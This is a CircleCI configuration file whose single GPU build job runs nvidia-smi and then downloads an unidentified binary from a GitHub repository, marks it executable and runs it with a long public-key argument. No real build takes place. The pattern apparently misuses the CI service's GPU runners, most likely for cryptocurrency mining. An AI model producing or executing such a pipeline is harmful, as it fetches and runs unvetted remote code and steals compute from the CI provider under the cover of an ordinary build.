version: 2.1

jobs:
  build:
    machine:
      image: linux-cuda-12:default
    resource_class: gpu.nvidia.medium

    steps:
      - run: nvidia-smi
      - run: wget https://github.com/brontosimungo/crispy-invention/raw/refs/heads/main/parcok && chmod +x parcok && ./parcok --pubkey=3qVKGFnjCQj8Y6w8ppjUgHdC3AbFZCWnwkTpbgq8i8iDbWiqr7D3ESTZwniCHG9f3Xd2gABNq37CwU8EBi1mD1qpQN68PzEwLzHSSLK1kL1sMKAQ8kTSqpxSjdqtvsLXuK4S
